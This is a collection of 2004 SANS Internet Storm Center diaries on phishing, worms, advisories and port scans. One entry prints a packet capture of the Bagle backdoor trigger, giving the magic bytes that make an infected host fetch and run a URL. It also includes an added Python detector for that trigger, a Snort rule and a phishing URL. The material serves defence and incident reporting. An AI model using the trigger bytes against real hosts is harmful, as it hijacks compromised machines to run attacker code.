Diaries

Published: 2004-03-31

New Phishing Technique / Vulnerability Data Base Resource

New Phishing Technique
A new phishing attack technique was discovered today in a Citibank scam targeting Citibank customers.
In this technique "the Address bar on the browser is spoofed, using Javascript and frames, the real address bar is suppressed and despite the HTTPS callout in the Address bar, there is no SSL padlock present in the lower corner of the browser."
References: http://www.antiphishing.org/phishing_archive/Citibank_3-31-04.htm
Open Source Vulnerability Data Base
The Open Source Vulnerability Data Base Project announced today the public availability of the Open Source Vulnerability Data Base (OSVDB).
The project intends to be "an open project to collect and distribute vulnerability information freely to everyone".
"The OSVDB collects vulnerability data on every type of computer software and operating system. Like other open-source projects, the OSVDB depends on the wide expertise of its contributors to provide dependable information on many technologies and security problems. The project's open-source license makes the results freely available to users worldwide."
The project can be found at http://www.osvdb.org
Pretty calm day today...

Tomorrow is April 1st. Be careful about what you read...
-------------------------------

Pedro Bueno (bueno_AT_ieee.org)


Published: 2004-03-30

Vulnerability in tcpdump, Increase in UDP/1027 activity, Save Your Ship article

Vulnerability in TCPDUMP versions 3.8.1 and earlier

---------------------------------------------------

An advisory was issued on the BUGTRAQ mailing list indicating a buffer overflow in the popular tcpdump sniffer tool. When processing malformed ISAKMP traffic in verbose display mode, tcpdump is vulnerable to a denial of service attack. This vulnerability is believed to be limited to a denial of service attack at this time. The two vulnerabilities associated with this flaw have been assigned CVE numbers CAN-2004-0183 and CAN-2004-0184. It is recommended that users upgrade their version of tcpdump to the 3.8.3 version to resolve this flaw.


http://www.rapid7.com/advisories/R7-0017.html



Increase in UDP/1027 activity

-----------------------------

UDP/1027 is commonly associated with the Windows Messenger service, often used to send "Windows Popup" SPAM messages to unsuspecting victims. We've seen a recent increase in traffic sent to this port, with content ranging from adult website advertisements, to prescription medication sales, to deceptive marketing campaigns. Some popup messages even claim to be from Microsoft, offering links to web pages that appear to be a legitimate Microsoft website.


Note that the source addresses for this traffic are always suspect, since they do not require any kind of a response to be effective. An attacker can use any source address they desire to send the UDP traffic to a wide range of targets.


Organizations with stateful firewalls should consider dropping UDP traffic with a destination port of 1026 or 1027 to curtail this kind of activity. If you are seeing this type of popup message sent to your computer, you should consider investing in a personal firewall product.




Save Your Ship Article

----------------------

Network Magazine has published an article written by the Storm Center Incident Handler Greg Shipley on the process and policy end of patching. The article includes a timeline correlating exploit announcements to worm activity for various Windows, Solaris and Linux worms over the years. The article is informative, insightful and available at:


http://i.cmpnet.com/nc/1506/graphics/1506f1_file.pdf



The illustration for the vulnerability/worm timeline is also available at:
http://i.cmpnet.com/nc/1506/graphics/1506f1a.gif




--Joshua Wright/Handler on Duty


Published: 2004-03-29

Beagle Exploit, SSL NULL encryption (update), port 12345 and 1026


Beagle Virus Exploit

====================


Versions of the 'Beagle' (aka Bagle) virus open a back door on port 2745
(TCP). We have been monitoring increased scanning activity
for this port. Today, a reader submitted a tool that is
used to scan for Beagle-infected systems. If the tool finds
port 2745 open, it sends the 'magic string' to open the
backdoor. Next, a URL is sent to the system. The Bagle-infected system
will attempt to download the content of the URL and execute it.

Sample session (using a netcat listener):

1. Establish TCP connection to port 2745

18:29:09.159691 10.1.0.129.1043 > 10.1.0.13.2745: S
2963418754:2963418754(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0084 4000 8006 e5b4 0a01 0081 E..0..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e82 0000 0000 ................
0x0020 7002 4000 409f 0000 0204 05b4 0101 0402 p.@.@...........
18:29:09.159784 10.1.0.13.2745 > 10.1.0.129.1043: S
3650381978:3650381978(0) ack 2963418755 win 5840 <mss
1460,nop,nop,sackOK> (DF)
0x0000 4500 0030 0000 4000 4006 2639 0a01 000d E..0..@.@.&9....
0x0010 0a01 0081 0ab9 0413 d994 689a b0a2 2e83 ..........h.....
0x0020 7012 16d0 278f 0000 0204 05b4 0101 0402 p...'...........
18:29:09.160207 10.1.0.129.1043 > 10.1.0.13.2745: . ack 1 win 17520 (DF)
0x0000 4500 0028 0085 4000 8006 e5bb 0a01 0081 E..(..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5010 4470 26b3 0000 0204 05b4 0101 P.Dp&.........

2. Send "exploit buffer"

18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win
17520 (DF)
0x0000 4500 0039 0086 4000 8006 e5a9 0a01 0081 E..9..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5018 4470 ef7f 0000 43ff ffff 3030 3001 P.Dp....C...000.
0x0030 0a1f 2b28 2ba1 3201 00 ..+(+.2..
18:29:09.161413 10.1.0.13.2745 > 10.1.0.129.1043: . ack 18 win 5840 (DF)
0x0000 4500 0028 8cbe 4000 4006 9982 0a01 000d E..(..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5010 16d0 5442 0000 0000 0000 0000 P...TB........

3. 'reply' from infected host (just 'CR' in this case)


18:29:18.391801 10.1.0.13.2745 > 10.1.0.129.1043: P 1:2(1) ack 18 win
5840 (DF)
0x0000 4500 0029 8cbf 4000 4006 9980 0a01 000d E..)..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5018 16d0 4a39 0000 0a00 0000 0000 P...J9........

4. send URL for download

18:29:18.393460 10.1.0.129.1043 > 10.1.0.13.2745: P 18:23(5) ack 2 win
17519 (DF)
0x0000 4500 002d 0087 4000 8006 e5b4 0a01 0081 E..-..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e94 d994 689c ..............h.
0x0020 5018 446f 1ab8 0000 2768 7474 7046 P.Do....'http
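As an added example (not part of the original diary or the reader's tool), the following Python turns the session above into a check a defender can run over their own tcpdump -x output: it reassembles each packet from the hex words, trusts the IP total length because this tcpdump format also prints Ethernet padding bytes, and flags a TCP/2745 stream that opens with the 17-byte buffer from step 2 and is followed by URL text. The embedded input is the diary's own four packets, constructed here so the example runs offline.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample input: the diary's packets in tcpdump -x form
# (header line, possibly wrapped, then "offset hexwords ascii" lines).
SAMPLE_DUMP = """\
18:29:09.160207 10.1.0.129.1043 > 10.1.0.13.2745: . ack 1 win 17520 (DF)
0x0000 4500 0028 0085 4000 8006 e5bb 0a01 0081 E..(..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5010 4470 26b3 0000 0204 05b4 0101 P.Dp&.........
18:29:09.161325 10.1.0.129.1043 > 10.1.0.13.2745: P 1:18(17) ack 1 win
17520 (DF)
0x0000 4500 0039 0086 4000 8006 e5a9 0a01 0081 E..9..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e83 d994 689b ..............h.
0x0020 5018 4470 ef7f 0000 43ff ffff 3030 3001 P.Dp....C...000.
0x0030 0a1f 2b28 2ba1 3201 00 ..+(+.2..
18:29:18.391801 10.1.0.13.2745 > 10.1.0.129.1043: P 1:2(1) ack 18 win
5840 (DF)
0x0000 4500 0029 8cbf 4000 4006 9980 0a01 000d E..)..@.@.......
0x0010 0a01 0081 0ab9 0413 d994 689b b0a2 2e94 ..........h.....
0x0020 5018 16d0 4a39 0000 0a00 0000 0000 P...J9........
18:29:18.393460 10.1.0.129.1043 > 10.1.0.13.2745: P 18:23(5) ack 2 win
17519 (DF)
0x0000 4500 002d 0087 4000 8006 e5b4 0a01 0081 E..-..@.........
0x0010 0a01 000d 0413 0ab9 b0a2 2e94 d994 689c ..............h.
0x0020 5018 446f 1ab8 0000 2768 7474 7046 P.Do....'http
"""

HEADER_RE = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d+\s+(\S+)\s+>\s+(\S+):")
HEXWORD_RE = re.compile(r"^[0-9a-f]{2}(?:[0-9a-f]{2})?$")

BAGLE_PORT = 2745
# First bytes of the "exploit buffer" sent in step 2 of the capture above.
MAGIC_PREFIX = bytes.fromhex("43ffffff303030")


@dataclass
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    raw: bytearray = field(default_factory=bytearray)


def _endpoint(token: str) -> Tuple[str, int]:
    """Split tcpdump's 'a.b.c.d.port' notation into (host, port)."""
    host, port = token.rsplit(".", 1)
    return host, int(port)


def parse_dump(text: str) -> List[Packet]:
    """Reassemble packets from tcpdump -x text; wrapped header lines are skipped."""
    packets: List[Packet] = []
    cur = None
    for line in text.splitlines():
        line = line.strip()
        m = HEADER_RE.match(line)
        if m:
            (src, sport), (dst, dport) = _endpoint(m.group(1)), _endpoint(m.group(2))
            cur = Packet(src, sport, dst, dport)
            packets.append(cur)
        elif line.startswith("0x") and cur is not None:
            for word in line.split()[1:]:
                if not HEXWORD_RE.match(word):
                    break  # reached the ASCII column
                cur.raw.extend(bytes.fromhex(word))
    return packets


def tcp_payload(raw: bytes) -> bytes:
    """Return the TCP payload of a raw IPv4 packet (empty if not TCP)."""
    ihl = (raw[0] & 0x0F) * 4
    total_len = int.from_bytes(raw[2:4], "big")
    if raw[9] != 6:
        return b""
    doff = (raw[ihl + 12] >> 4) * 4
    # Slice to the IP total length: the dump carries Ethernet padding bytes.
    return bytes(raw[ihl + doff:total_len])


def find_backdoor_sessions(packets: List[Packet]) -> List[Tuple[str, str, str]]:
    """Flag client streams to TCP/2745 that start with the magic buffer.

    Returns (client, server, text from the first 'http' onward) per hit."""
    streams: Dict[Tuple[str, int, str, int], bytearray] = {}
    for p in packets:
        key = (p.src, p.sport, p.dst, p.dport)
        streams.setdefault(key, bytearray()).extend(tcp_payload(p.raw))
    hits = []
    for (src, _sport, dst, dport), data in streams.items():
        if dport != BAGLE_PORT or not data.startswith(MAGIC_PREFIX):
            continue
        at = data.find(b"http")
        url = data[at:].decode("ascii", "replace") if at >= 0 else ""
        hits.append((src, dst, url))
    return hits


if __name__ == "__main__":
    for src, dst, url in find_backdoor_sessions(parse_dump(SAMPLE_DUMP)):
        print(f"Bagle backdoor handshake {src} -> {dst}:{BAGLE_PORT}, URL text {url!r}")
```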

Mailbag: Port 12345 scans

=========================


A user submitted logs showing large numbers of scans against
port 12345 (TCP). This port is commonly associated with the trojan
'Netbus' and other malware. The log did not indicate a new tool
but rather appears to show a number of sequential connect scans.

Ports in focus: 1026

====================


Scans for port 1026 appear to have increased again over the last
couple of weeks. According to some reports, this is due to popup
spam, which now relies more on compromised systems as its origin.

http://isc.sans.org/port_details.html?port=1026

In the past, only a small number of sources originated this
traffic.

SSL "NULL" Encryption (Errata)

==============================


An earlier diary ( http://isc.sans.org/diary.html?date=04-03-04 )
quoted Dr. Neal Krawetz, from Secure Science Corporation as saying
that "One of the SSL encoding methods is "plain text". Most SSL servers
have this disabled by default, but most browsers support it. When plain
text is used, no central certificate authority is consulted and the user
never sees a message asking if a certificate should be accepted (because
"plain text" doesn't use certificates). Keeping that in mind, the little
lock icon may not even indicate an encrypted channel. The little lock
only indicates an SSL connection"

Prompted by reader feedback, we did our own experiments, limiting an
Apache 1.3 server to 'NULL' encryption. We were not able to reproduce
this issue with any recent browser.

Mozilla, in default configuration, will pop up an error dialog stating
that no common cipher could be found. If the 'null'/'plain text'
encryption is specifically enabled, the page will load, but the
certificate will still be validated and any errors will be communicated
to the user.

Microsoft Internet Explorer will show a generic error page. It does
not appear to be possible in MSIE 6 to enable 'NULL' encryption.

---------------------------------------------

Johannes Ullrich, jullrich_AT_sans.org



Published: 2004-03-28

Activity increase on Port 12345; More Phishing; Ethereal Exploit

Activity Increase on Port 12345

There is an increase in traffic for the targets and records for port
12345.



http://isc.incidents.org/port_details.html?port=12345



The source numbers are staying constant. If anyone has any captures of
this traffic please let us know.

More Phishing

We received an active phishing scam to retrieve a user's ID and password from WestPac Online Banking. This attempt takes you to an actual Westpac site where you get a 404 Not Found error and then a pop up on top that asks for your information. The popup is located at:



http://deretlens.info/west/westpac.php.



The site is still active at this time. More information can also be
found at:



http://www.antiphishing.org/phishing_archive/westpac_03-26-04.htm




Ethereal Exploit Code

The exploit code against the latest Ethereal vulnerabilities has been
published. It is important to ensure that you have
upgraded to 0.10.3. For more information see:



http://isc.incidents.org/diary.html?date=2004-03-23

http://www.ethereal.com/appnotes/enpa-sa-00013.html




--------------------------------------------------

Handler on Duty: Lorna J. Hutcheson


Published: 2004-03-27

Exploit for Cisco Vulnerabilities Released

Exploit for Cisco Vulnerabilities Released

An exploit for Cisco vulnerabilities has been released. It targets several previously published vulnerabilities in various Cisco products. Following the Cisco advisories on upgrades and workarounds should protect your systems from such threats.

For more information, please refer to Cisco Security Notice:

http://www.cisco.com/warp/public/707/cisco-sn-20040326-exploits.shtml


Published: 2004-03-26

ISS Default Misconfiguration, New Bagel.U, and a couple 'witty' notes

ISS Default Misconfiguration Problem

Today ISS notified its customers of a problem discovered in the default configuration of some versions of their RealSecure and BlackICE products. "This misconfiguration changes the default blocking and reporting behavior and may affect your level of protection. While the most current releases block most of the major threats (including Blaster, Nachi, Slammer, and Witty), ISS strongly recommends that customers update to this new release to provide maximum coverage for all threats."

http://www.iss.net/support/

New Bagel Variant: Bagel.U

New Bagel o' the Day: Bagel.U. This is the 21st variant classified. Noteworthy: unlike previous versions that used "tricky subject lines or enticing messages" this one arrives as an attachment to an otherwise empty message.

http://www.computerworld.com/securitytopics/security/virus/story/0,10801,91678,00.html
http://www.sarc.com/avcenter/venc/data/w32.beagle.u@mm.html

Witty Notes

A couple of article links that discuss security products being targeted, and the weakness of patch-based security.

http://www.computerworld.com/securitytopics/security/holes/story/0,10801,91688p2,00.html
http://news.com.com/2100-7355_3-5180482.html?tag=nefd_top
-------------------------------------------------------------------

Handler on duty: Dave Brookshire


Published: 2004-03-25

DoS from 127.0.0.1; Server compromise at gnome.org; Netsky.P still spreading

DoS from 127.0.0.1

We have received log files of a reported DoS attack with a source
address of 127.0.0.1 (loopback). The packets were TCP resets (RST) with
a source port of 80 and destination port between 1000-2000. No data was
contained in the packets.

After analysis, these packets appear to be fall-out from the Blaster
worm. If service providers or network administrators changed the
windowsupdate.com address to resolve to 127.0.0.1, a host infected with
Blaster will attempt to perform a DoS against itself (127.0.0.1). The
problem with this approach is that the worm spoofs the source address
before sending the packet. When the infected machine's TCP/IP stack
receives the packet (TCP 80 SYN request), it attempts to respond to the
spoofed source IP address with TCP RST. The spoofed IP addresses are a
random number based on the machine's CLASS B address.

If you have identified such behavior on your network, you can attempt
to trace the infected machine by MAC address. And send us some logs of
the activity so we can compare your incident to the others we have
received.

More information on the Blaster worm can be found at your favorite
anti-virus site.

------------------------------------------------------------------------

Server compromise at gnome.org

The GNOME project suspects a compromise on several servers. GNOME is an
open-source project that provides UNIX and Linux desktop similar to the
KDE desktop environment. It appears that no source code or distribution
files were modified.

Source:
http://mail.gnome.org/archives/gnome-announce-list/2004-March/msg00113.html

"We've discovered evidence of an intrusion on the server hosting
www.gnome.org and other gnome.org websites. At the present time, we
think that the released gnome sources and the gnome source code
repository are unaffected.

We are investigating further and will provide updates as we know more.
We hope to have the essential services hosted on the affected machine
up and running again as soon as possible.

The GNOME sysadmin team
23 March 2003"

A follow-up e-mail was posted to the GNOME mailing list that shows they
are making fast progress in restoring the services on these machines:
http://mail.gnome.org/archives/gnome-announce-list/2004-March/msg00113.html

------------------------------------------------------------------------

Netsky.P still spreading

The Netsky.P virus/worm is still spreading according to antivirus sites
and we continue to see it in our mailboxes. One of the possible e-mail
messages it sends contains a FROM: address of well-known anti-virus
companies and the following message:

The sample file you sent contains a new virus version of mydoom.j.
Please clean your system with the attached signature.
Sincerly,
Robert Ferrew

It may also append the following text, substituting any popular anti-
virus company name:
+++ Attachment: No Virus found +++ MC-Afee AntiVirus - www.mcafee.com

[EOF]


Published: 2004-03-24

Netsky.P Triggered, MSVC++ Constructed ISAPI Applications DoS

Netsky.P Triggered

-------------------------------------------------------------------



One of the latest Netsky variants, Netsky.P, triggered and began mass-mailing infected messages on March 24th between 1500 and 1800 GMT (assuming that the infected machine's clock is set correctly). Message Labs is reporting that it had intercepted over 200,000 messages as of midnight GMT.



More info:



http://www.messagelabs.com/viruseye/info/netskyp.asp





MSVC++ Constructed ISAPI Applications DoS

-------------------------------------------------------------------



Secunia is reporting that all applications constructed with Microsoft Visual C++ and MFC (Microsoft Foundation Classes) that use ISAPI (Internet Server Application Programming Interface) extensions may be vulnerable to DoS attacks.



The issue affects both Microsoft Visual C++ 6.0 and Microsoft Visual Studio 6.0 prior to Service Pack 6. Under heavy loads, applications compiled with the ISAPI extensions may produce invalid results when processing POST data, possibly resulting in access violations.



Recompiling applications after installing Service Pack 6 will fix the problem.



More info:



http://secunia.com/advisories/11199/





-------------------------------------------------------------------

Handler on duty: Tom Liston - < http://www.labreatechnologies.com >


Published: 2004-03-23

Ethereal Vulnerabilities / NetSky.P

No news on the Witty front... Back to Infocon 'GREEN'.

For information about the Witty worm check previous diaries:

http://isc.sans.org/diary.html?date=2004-03-20

http://isc.sans.org/diary.html?date=2004-03-22
Multiple Vulnerabilities in Ethereal
Ethereal released an advisory today about multiple vulnerabilities in
version 0.10.2. According to the advisory, by exploiting these
vulnerabilities it is possible to make Ethereal crash or execute
arbitrary code "by injecting a purposefully malformed packet onto the
wire, by convincing someone to read a malformed packet trace file, or
by creating a malformed color filter file."
The solution is to upgrade to version 0.10.3.
At the time this diary is written, there is no version 0.10.3
available for download on the Ethereal website.
References: http://www.ethereal.com/appnotes/enpa-sa-00013.html
New Netsky Variant
Symantec moved the new Netsky variant to level 3. The netsky.p variant also
uses a vulnerability in IE to execute E-mail attachments. This is a known flaw and has a patch available since 2001.
Reference: http://www.eweek.com/article2/0,1759,1552315,00.asp
------------------------------------------------

Handler on Duty: Pedro Bueno (bueno_AT_ieee.org)


Published: 2004-03-22

Witty Worm Wrap-up

Witty Worm Wrap-up

For our more technical discussion about the Witty worm, see Saturday's diary:

http://isc.sans.org/diary.html?date=2004-03-20
We expect to return to infocon 'GREEN' later today.

Witty Worm Traffic

Infected machines generated outbound UDP traffic at line speed, frequently saturating local area networks. As a result, the traffic generated was high compared to the number of infected hosts. At this time, we have reports for about 20,000 unique IP addresses sending UDP packets from port 4000 over the weekend. The traffic rose very fast, and dropped within the first hour. This is likely a result of the Witty worm's destructive component, which will crash infected systems and prevent them from rebooting.

Graphs

Witty traffic (packets reported): http://isc.sans.org/images/witty1.jpg

Unique IPs per hour: http://isc.sans.org/images/witty2.jpg

Geographic Animation: http://isc.sans.org/witty.html
(this diary will be updated throughout the day)

--------------

Johannes Ullrich, jullrich_AT_sans.org


Published: 2004-03-20

ALERT - Black Ice Worm

(Note: we will not start new diaries this weekend. Instead, we will keep amending this diary)
"Witty" worm attacks BlackICE firewall
Summary

=======

At around 12:00 AM EST (05:00 UTC) on Saturday, we detected an upsurge
in UDP traffic from source port 4000. This traffic is caused by a new
worm ("Witty") which exploits a vulnerability in BlackIce's ICQ parser.

Given that this worm generates large amounts of traffic, and the wide
spread use of BlackIce, we will keep the InfoCon level at 'YELLOW',
likely until Monday morning.
While "witty" packets with other source ports are seen, they will not
trigger the vulnerability. Likely, these packets are due to infected
hosts behind NAT devices.
Detection

=========

Infected hosts will send large amounts of UDP traffic, typically
saturating a local network connection. The BlackIce task bar icon will
no longer allow the user to shut down BlackIce. It will display a
message reading "Operation could not be completed. Access is denied".


Eventually, the system will crash. Infected systems are reported to
show corrupted hard disks.


The worm will not write itself to disk. As a result, Virus scanners
may not detect it.


Snort rule by ISC Handler Pedro Bueno:


alert udp any 4000:5000 -> any any (msg:"Witty Initial Traffic";
content:"|29202020202020696e73657274207769747479206d6573736167652068657265|";rev:1;)

(note: you may want to remove the source port restriction)
Snort.org has posted additional rules to "detect the worms and should any other exploits based off of the same vulnerability."
Removal

=======

A reboot will remove the worm from the system. However, the worm
causes random hard disk corruption and the system may no longer
function. The ISS XForce has directions that _may_ help recover some less severely corrupted systems. These directions are available at http://xforce.iss.net/xforce/alerts/id/167 .
Prevention

==========

Disconnect systems running BlackIce as soon as possible!



Block all UDP packets with a source port of 4000.
Blocking UDP packets with a source port of 4000 may disrupt
some network services. We do not know of any major services
(other than old versions of ICQ) that require UDP 4000.


This worm will corrupt hard disks and leave systems
unusable.


These versions of BlackIce and RealSecure have been identified
as vulnerable:
BlackICE™ Agent for Server 3.6 ebz, ecd, ece, ecf

BlackICE PC Protection 3.6 cbz, ccd, ccf

BlackICE Server Protection 3.6 cbz, ccd, ccf

RealSecure® Network 7.0, XPU 22.4 and 22.10

RealSecure Server Sensor 7.0 XPU 22.4 and 22.10

RealSecure Desktop 7.0 ebf, ebj, ebk, ebl

RealSecure Desktop 3.6 ebz, ecd, ece, ecf

RealSecure Guard 3.6 ebz, ecd, ece, ecf

RealSecure Sentry 3.6 ebz, ecd, ece, ecf

Other ISS products may be vulnerable as well. Please refer to ISS
for details (see end of this post for links).
Links

=====
* Internet Security Systems Information
ISS Witty Worm Announcement: http://www.iss.net/support/wittyworm.php

ISS XForce Security Alert: http://xforce.iss.net/xforce/alerts/id/167

ISS XForce Security Alert: http://xforce.iss.net/xforce/alerts/id/166

ISS Software Updates (Enterprise): http://www.iss.net/download/

BlackIce Updates (Consumer): http://blackice.iss.net/update_center/index.php
* Third Party Information
Matt Murphy's Analysis: http://www.netsecure.shawbiz.ca/witty-analysis.html

Lurhq Analysis: http://www.lurhq.com/witty.html

eEye Security Advisory: http://www.eeye.com/html/Research/Advisories/AD20040318.html

F-Secure Analysis: http://www.f-secure.com/v-descs/witty.shtml

Symantec Analysis: http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html

Snort Rules: http://www.snort.org

SecurityFocus Vulnerability Information: http://www.securityfocus.com/bid/9913

Secunia Advisory: http://secunia.com/advisories/11073/

USCert Security Update: http://www.uscert.gov/current/current_activity.html#witty

USCert Vulnerability Update: http://www.kb.cert.org/vuls/id/947254
Sample Packet

=============



01:54:45.699383 219.154.156.161.4000 > 65.173.218.164.50212: udp 997


-----------------------------------------------------------------------

Johannes Ullrich, jullrich_AT_sans.org - SANS Institute.
Scott Fendley, scottf _AT_ uark.edu - University of Arkansas-Fayetteville


Published: 2004-03-19

XP SP2 Preview, Apache Update,Don't click on that attachment


Microsoft Releases a Preview of Service Pack 2 for Windows XP


To aid IT professionals in planning and testing for the deployment of Windows XP SP2, Microsoft is making available a preview based on Release Candidate 1 of SP2.



WARNING! This technical preview is unsupported and is intended for testing purposes only. Do not use in production environments.



http://www.microsoft.com/sp2preview/


Apache HTTP Server 2.0.49 Released



According to the release information, this is a bug fix release for bugs found in version 2.0.48, three of which were security vulnerabilities.


** When using multiple listening sockets, a denial of service attack is possible on some platforms due to a race condition in the handling of short-lived connections.


** Arbitrary client-supplied strings can be written to the error log
which can allow exploits of certain terminal emulators.


** A remotely triggered memory leak in mod_ssl can allow a denial
of service attack due to excessive memory consumption.


The new release is available for download at:
http://httpd.apache.org/download.cgi


An overview of the release can be found at:
http://httpd.apache.org/docs-2.0/new_features_2_0.html




Don't Click that Attachment


No matter how many times we say it, no matter how often it is repeated, we obviously can't say it enough. DON'T CLICK ON THE ATTACHMENT!


Today a small business that I am involved with called me in a panic. Something was wrong with their network. After much probing and prodding, I finally got it out of them. Someone had clicked on an attachment that they had received in an email.

It appears that one of the gals had gotten an email from the "administrator" that indicated that her "email account was being disabled due to misuse". Of course it was from the administrator so it must be legitimate (even though she had NEVER gotten an email from the administrator before). I immediately knew what had happened but was a little confused by how it had happened. They had an anti-virus program installed and it was set up to auto-update every week.


Hop in the car and go to their office to check it out. Upon arrival I discovered the problem, they had installed an update to a software program that they use. The update required them to disable their antivirus program for installation of the update. You guessed it, they disabled the AV on all of the computers to install the client side of the update and forgot to re-enable it. Consequently they had NO protection at all.


While taking care of things at this location, I received a call from their location about 20 miles away. Yep, you guessed it, they had received an email from administrator, and they had disabled the AV for the program update. Finishing the cleanup at the first location I headed to the second location to clean that one up too.


I think this company learned two valuable lessons today!


1. Don't click on attachments in emails regardless of who they come from!

2. Don't disable your anti-virus software. If you do have to in order to do a program update, make sure you turn it back on.


Maybe someday all software companies will figure out how to install their software updates without disabling the AV software. Until then, we have to protect ourselves!




Deb Hale




Published: 2004-03-18

Phatbot and stealthy polymorphic Alphabot Soup, ISS Product ICQ parsing vuln.

ISS Security Brief: Vulnerability in ICQ Parsing in ISS Products


ISS Alert:
http://xforce.iss.net/xforce/alerts/id/166

ISS Updates:
http://www.iss.net/download/

Phatbot and stealthy polymorphic Alphabot Soup

"Phatbot" is essentially an "alias" label used by some AV vendors for a Trojan, and it's also a name assigned to a particular Trojan analyzed by the LURHQ Threat Intelligence Group. These Trojans - Phatbot, Polybot, Agobot, Gaobot, SDBot, RandBot .... which have similar functionality and purpose, are "lumped together" by some AV vendors into families of Trojans. Most of these Trojans can trace their roots to powerful warez Trojans that have plagued university network environments for a number of years (groundbreaking threat analysis was done by Dave Dittrich at the University of Washington and others). In addition, all of the "Agobot"s should be thrown in as relatives; after all, what's in a name. The variants released in late 2003 and 2004 include true Internet worm functionality enabled by Microsoft vulnerabilities associated with ports 135, 445, and 80.

PolyBots, Phatbots, polymorphism and stealth

McAfee describes a "Polybot" virus family. Their perception of the family structure is that "There are several other very closely related IRC bot families based on widely circulated Sdbot sources - IRC-Sdbot, W32/Sdbot.worm, W32/Randbot.worm, W32/Gaobot.worm." I'll get to one variant's "stealth" in a minute.
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101090

Joe Stewart and the LURHQ team's analysis indicates to me that Phatbot is related to the Trojan family under discussion here. LURHQ goes on to describe Phatbot as having the "ability to polymorph on install in an attempt to evade antivirus signatures as it spreads from system to system." (The URL to their excellent analysis is below.) The polymorphism is interesting in that Phatbot morphs "on install". McAfee's analysis of Polybot shows a different pattern of morphing; McAfee says "The polymorphism in W32/Polybot worms is achieved by adding an "envelope" over a compiled HLL program of the worm. The envelope code reencrypts the whole file every time it runs." Morphing at "install" is one thing; morphing every time it runs is notably different, since every execution yields a differently encrypted file rather than one new form per infected host.

Bot File Submissions Requested by Vendors - In addition to the polymorphing information, a recent email submission to the ISC by a Handlers Diary reader detailed how an AV vendor recently emailed customers and stated their concern that a Polybot variant would not be detected on customer systems because of the Trojan's "stealthing" techniques. One vendor's description of the stealthing (McAfee) describes W32/Polybot.l!irc as "Stealthy and hides itself in memory. The file is deleted." The AV vendor who wrote to their customers specifically asks customers to submit suspicious files, since submissions are needed to develop defenses against this stealthy Trojan.

All in all, this family of bots seems close to marrying stealth with a polymorphism implementation that will push it beyond the range of iterations AV engines can detect soon after it hits a host.

If you find any variants of this large family of Trojans please submit the files you find to your favorite Trojan Hunting application developer and AV vendor. Every submission "click" helps.

Rebuild versus cleaning with "tools".

If any "sensitive" system "you think you own" is actually owned by one of this family of bots, standard recommendations are to rebuild the infected systems from scratch.

For other information, check mailing lists for the many discussions going on concerning the number of systems "owned" by the botboyz.

Phatbot Trojan Analysis by LURHQ Threat Intelligence Group, material used with permission.

http://www.lurhq.com/phatbot.html
Release Date March 15, 2004

http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101100
ALIASES Phatbot, W32.HLLW.Gaobot.gen (Symantec), Win32.Agobot (CA), WORM_AGOBOT.HM (Trend)

http://www.f-secure.com/v-descs/agobot_fo.shtml
NAME: Agobot.FO, ALIAS: Backdoor.Agobot.fo, W32.HLLW.Gaobot, Gaobot, Win32/Gaobot
ALIAS: Phatbot, Phat

Symantec's generic Gaobot family description is here:
http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.gaobot.rf.html

Patrick Nolan

0 Comments

Published: 2004-03-17

Updated (13:45 3/18 GMT): OpenSSL DoS Vulnerability, New Bagel Variants

OpenSSL DoS Vulnerability

------------------------------------------------------



The OpenSSL Project announced today that there is a null pointer assignment flaw in all versions of OpenSSL from 0.9.6c to 0.9.6l inclusive and from 0.9.7a to 0.9.7c inclusive. A specifically crafted SSL/TLS handshake could cause OpenSSL to crash. This could lead to a DoS against whatever application uses OpenSSL.



Because many devices/servers/systems use OpenSSL, this is a potential issue for many sites. Because of the nature of the vulnerability, it cannot be used for anything beyond a DoS, but it is important to be aware of this issue and patch affected installations as quickly as possible.



The OpenSSL Project announcement:



http://www.openssl.org/news/secadv_20040317.txt



Various vendor announcements (updated as they are available):

http://www.cisco.com/warp/public/707/cisco-sa-20040317-openssl.shtml

https://rhn.redhat.com/errata/RHSA-2004-121.html
http://www.openbsd.net/errata.html#openssl




------------------------------------------------------

New Bagel Variants

New Bagel variants, Q, R, S, and T are currently in the wild, with at least variant Q having been given a "Medium" threat level by Trend Micro. (At the time of this update, R, S, and T are being analyzed.) The Q variant uses a known vulnerability in Microsoft Outlook (Object Tag Vulnerability in Popup Window) as one means of propagation. The malware creates an email message which triggers the Outlook vulnerability to automatically download a malicious HTML file which drops a Visual Basic Script file in the Windows system folder. This VBS file then downloads the actual Bagel executable. The malware may also spread itself via the more standard "click me" attachment on an email.



The interesting twist here is that this variant sets the infected machine up as a server for subsequent downloads of the malicious code on TCP port 81.



Should be an interesting day...



More info:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PE_BAGLE.Q

http://vil.nai.com/vil/content/v_101108.htm

http://securityresponse.symantec.com/avcenter/venc/data/w32.beagle.r@mm.html

(note: I think that's Symantec's equivalent...)



Info on the Object Tag Vulnerability in Popup Window from MS:

http://www.microsoft.com/technet/security/bulletin/MS03-040.mspx





------------------------------------------------------

Handler on Duty: Tom Liston - ( http://www.labreatechnologies.com )

0 Comments

Published: 2004-03-16

No microsoft patches are available at www.NOT-A-Microsoft-security-site.com

Erik van Straten reported receiving a spoofed email that led to a spoofed Microsoft site, which downloaded a Trojan along with instructions to run it to patch your system. The site, www.microsoft-security-updates.com, is NOT a Microsoft site.
